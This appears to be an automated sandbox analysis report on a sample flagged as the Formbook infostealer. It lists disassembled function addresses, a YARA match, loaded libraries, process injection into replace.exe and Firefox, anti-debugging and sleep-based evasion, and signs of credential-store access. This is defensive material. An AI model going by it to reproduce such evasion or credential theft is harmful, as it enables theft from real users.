            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_00158F30 NtDeleteFile,4_2_00158F30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_00158FD0 NtClose,4_2_00158FD0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0093F97A NtSetContextThread,4_2_0093F97A
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C552A04_2_02C552A0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02CF02744_2_02CF0274
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C5E3F04_2_02C5E3F0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D103E64_2_02D103E6
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C9739A4_2_02C9739A
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D0A3524_2_02D0A352
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C3D34C4_2_02C3D34C
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D0132D4_2_02D0132D
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02CFF0CC4_2_02CFF0CC
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C570C04_2_02C570C0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D0F0E04_2_02D0F0E0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D070E94_2_02D070E9
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D081CC4_2_02D081CC
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C5B1B04_2_02C5B1B0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D101AA4_2_02D101AA
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02CD81584_2_02CD8158
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C8516C4_2_02C8516C
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C3F1724_2_02C3F172
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D1B16B4_2_02D1B16B
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C401004_2_02C40100
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02CEA1184_2_02CEA118
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D016CC4_2_02D016CC
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C6C6E04_2_02C6C6E0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C4C7C04_2_02C4C7C0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D0F7B04_2_02D0F7B0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C747504_2_02C74750
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C507704_2_02C50770
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02CFE4F64_2_02CFE4F6
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D024464_2_02D02446
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C414604_2_02C41460
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D0F43F4_2_02D0F43F
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D105914_2_02D10591
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02CED5B04_2_02CED5B0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D075714_2_02D07571
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C505354_2_02C50535
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02CFDAC64_2_02CFDAC6
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C4EA804_2_02C4EA80
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02CEDAAC4_2_02CEDAAC
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C95AA04_2_02C95AA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D07A464_2_02D07A46
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D0FA494_2_02D0FA49
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02CC3A6C4_2_02CC3A6C
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D06BD74_2_02D06BD7
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C8DBF94_2_02C8DBF9
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02CC5BF04_2_02CC5BF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C6FB804_2_02C6FB80
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D0AB404_2_02D0AB40
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D0FB764_2_02D0FB76
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C538E04_2_02C538E0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C7E8F04_2_02C7E8F0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C368B84_2_02C368B8
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C528404_2_02C52840
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C5A8404_2_02C5A840
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02CBD8004_2_02CBD800
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C529A04_2_02C529A0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D1A9A64_2_02D1A9A6
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C599504_2_02C59950
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C6B9504_2_02C6B950
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C669624_2_02C66962
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D0EEDB4_2_02D0EEDB
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D0CE934_2_02D0CE93
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C62E904_2_02C62E90
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C59EB04_2_02C59EB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C50E594_2_02C50E59
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D0EE264_2_02D0EE26
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C42FC84_2_02C42FC8
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C5CFE04_2_02C5CFE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C51F924_2_02C51F92
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D0FFB14_2_02D0FFB1
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02CC4F404_2_02CC4F40
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D0FF094_2_02D0FF09
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C92F284_2_02C92F28
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C70F304_2_02C70F30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D0FCF24_2_02D0FCF2
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C40CF24_2_02C40CF2
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02CF0CB54_2_02CF0CB5
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C50C004_2_02C50C00
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02CC9C324_2_02CC9C32
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C6FDC04_2_02C6FDC0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C4ADE04_2_02C4ADE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C68DBF4_2_02C68DBF
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C53D404_2_02C53D40
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D01D5A4_2_02D01D5A
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D07D734_2_02D07D73
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C5AD004_2_02C5AD00
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_001418F04_2_001418F0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_001311214_2_00131121
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_001431904_2_00143190
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0014318B4_2_0014318B
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0015B6404_2_0015B640
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0013C8104_2_0013C810
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0013C8074_2_0013C807
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0013CA304_2_0013CA30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0013AAB04_2_0013AAB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_00144FB04_2_00144FB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0093E1E44_2_0093E1E4
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0093E30D4_2_0093E30D
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0093E69C4_2_0093E69C
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0093D7084_2_0093D708
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0093C9C84_2_0093C9C8
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 8_2_050FBFE78_2_050FBFE7
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 8_2_051126778_2_05112677
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 8_2_050F89278_2_050F8927
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 8_2_050E81588_2_050E8158
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 8_2_050FA1C78_2_050FA1C7
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 8_2_050FA1C28_2_050FA1C2
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 8_2_050F383E8_2_050F383E
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 8_2_050F38478_2_050F3847
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 8_2_050F3A678_2_050F3A67
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 8_2_050F1AE78_2_050F1AE7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03B75130 appears 36 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03BBF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03BAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03B2B970 appears 268 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03B87E54 appears 88 times
            Source: C:\Windows\SysWOW64\replace.exe Code function: String function: 02C97E54 appears 95 times
            Source: C:\Windows\SysWOW64\replace.exe Code function: String function: 02C3B970 appears 268 times
            Source: C:\Windows\SysWOW64\replace.exe Code function: String function: 02CBEA12 appears 86 times
            Source: C:\Windows\SysWOW64\replace.exe Code function: String function: 02C85130 appears 36 times
            Source: C:\Windows\SysWOW64\replace.exe Code function: String function: 02CCF290 appears 105 times
            Source: YSjOEAta07.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            The rule matched in each of the following sources:
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: 00000008.00000002.3172358807.00000000050E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: 00000004.00000002.3169852732.00000000007D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: 00000004.00000002.3169964546.0000000000820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: 00000002.00000002.1489720857.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: 00000004.00000002.3167311472.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: 00000002.00000002.1488814205.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@11/9
            Source: C:\Users\user\Desktop\YSjOEAta07.exe File created: C:\Users\user\AppData\Local\Temp\Maianthemum
            Source: YSjOEAta07.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\YSjOEAta07.exe File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\YSjOEAta07.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: replace.exe, 00000004.00000002.3167953756.0000000000644000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000002.3167953756.0000000000692000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000003.1672212746.0000000000671000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000002.3167953756.0000000000667000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000003.1670088273.0000000000667000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: YSjOEAta07.exe ReversingLabs: Detection: 52%
            Source: C:\Users\user\Desktop\YSjOEAta07.exe File read: C:\Users\user\Desktop\YSjOEAta07.exe
            Source: unknown Process created: C:\Users\user\Desktop\YSjOEAta07.exe "C:\Users\user\Desktop\YSjOEAta07.exe"
            Source: C:\Users\user\Desktop\YSjOEAta07.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\YSjOEAta07.exe"
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe Process created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"
            Source: C:\Windows\SysWOW64\replace.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\YSjOEAta07.exe Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\YSjOEAta07.exe Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\YSjOEAta07.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\YSjOEAta07.exe Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\YSjOEAta07.exe Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\YSjOEAta07.exe Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\YSjOEAta07.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\YSjOEAta07.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\YSjOEAta07.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\YSjOEAta07.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\YSjOEAta07.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: ulib.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe Section loaded: wininet.dll
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\YSjOEAta07.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
            Source: C:\Windows\SysWOW64\replace.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: YSjOEAta07.exe Static file information: File size 1361945 > 1048576
            Source: Binary string: replace.pdb source: svchost.exe, 00000002.00000002.1488514641.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1455923509.000000000341A000.00000004.00000020.00020000.00000000.sdmp, GmuPchEfAM.exe, 00000003.00000002.3168342119.00000000006D7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: replace.pdbGCTL source: svchost.exe, 00000002.00000002.1488514641.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1455923509.000000000341A000.00000004.00000020.00020000.00000000.sdmp, GmuPchEfAM.exe, 00000003.00000002.3168342119.00000000006D7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: GmuPchEfAM.exe, 00000003.00000000.1411401209.00000000002BE000.00000002.00000001.01000000.00000004.sdmp, GmuPchEfAM.exe, 00000008.00000002.3167314647.00000000002BE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000002.00000003.1389561003.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1387634356.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488900482.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000003.1490226852.0000000000A3F000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000002.3170402090.0000000002C10000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000002.3170402090.0000000002DAE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000003.1488017927.0000000000882000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000002.00000003.1389561003.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1387634356.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488900482.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, replace.exe, replace.exe, 00000004.00000003.1490226852.0000000000A3F000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000002.3170402090.0000000002C10000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000002.3170402090.0000000002DAE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000003.1488017927.0000000000882000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: replace.exe, 00000004.00000002.3172177851.000000000323C000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.3167953756.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000000.1558052270.0000000002CAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1780479653.00000000161AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: replace.exe, 00000004.00000002.3172177851.000000000323C000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.3167953756.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000000.1558052270.0000000002CAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1780479653.00000000161AC000.00000004.80000000.00040000.00000000.sdmp
            Source: YSjOEAta07.exe Static PE information: real checksum: 0xa961f should be: 0x1562a3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042D853 push edi; iretd 2_2_0042D85C
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 3_2_0270BA77 push edi; ret 3_2_0270BA80
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C409AD push ecx; mov dword ptr [esp], ecx4_2_02C409B6
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_001351DF push fs; iretd 4_2_001351E1
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_00150294 push 8DB602B4h; retf 4_2_0015029A
            Source: C:\Users\user\Desktop\YSjOEAta07.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\replace.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\YSjOEAta07.exeAPI/Special instruction interceptor: Address: 410E25C
            Source: C:\Windows\SysWOW64\replace.exeAPI/Special instruction interceptor: Address: 7FF90818D324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041480C rdtsc 2_2_0041480C
            Source: C:\Windows\SysWOW64\replace.exe Window / User API: threadDelayed 9844
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.8 %
            Source: C:\Windows\SysWOW64\replace.exeAPI coverage: 3.0 %
            Source: C:\Windows\SysWOW64\replace.exe TID: 8144 Thread sleep count: 129 > 30
            Source: C:\Windows\SysWOW64\replace.exe TID: 8144 Thread sleep time: -258000s >= -30000s
            Source: C:\Windows\SysWOW64\replace.exe TID: 8144 Thread sleep count: 9844 > 30
            Source: C:\Windows\SysWOW64\replace.exe TID: 8144 Thread sleep time: -19688000s >= -30000s
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe TID: 8184 Thread sleep time: -55000s >= -30000s
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe TID: 8184 Thread sleep time: -39000s >= -30000s
            Source: C:\Windows\SysWOW64\replace.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0014C230 FindFirstFileW,FindNextFileW,FindClose,4_2_0014C230
            Source: 6U0173jM.4.drBinary or memory string: dev.azure.comVMware20,11696497155j
            Source: replace.exe, 00000004.00000002.3167953756.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3168794274.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.1781965365.0000025A560AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\replace.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041480C rdtsc 2_2_0041480C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004175E3 LdrLoadDll,2_2_004175E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B533A5 mov eax, dword ptr fs:[00000030h]2_2_03B533A5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C061E5 mov eax, dword ptr fs:[00000030h]2_2_03C061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B87190 mov eax, dword ptr fs:[00000030h]2_2_03B87190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B70185 mov eax, dword ptr fs:[00000030h]2_2_03B70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h]2_2_03BEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h]2_2_03BEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B601F8 mov eax, dword ptr fs:[00000030h]2_2_03B601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B551EF mov eax, dword ptr fs:[00000030h]2_2_03B551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B551EF mov eax, dword ptr fs:[00000030h]2_2_03B551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B551EF mov eax, dword ptr fs:[00000030h]2_2_03B551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B551EF mov eax, dword ptr fs:[00000030h]2_2_03B551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B551EF mov eax, dword ptr fs:[00000030h]2_2_03B551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B551EF mov eax, dword ptr fs:[00000030h]2_2_03B551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B551EF mov eax, dword ptr fs:[00000030h]2_2_03B551EF
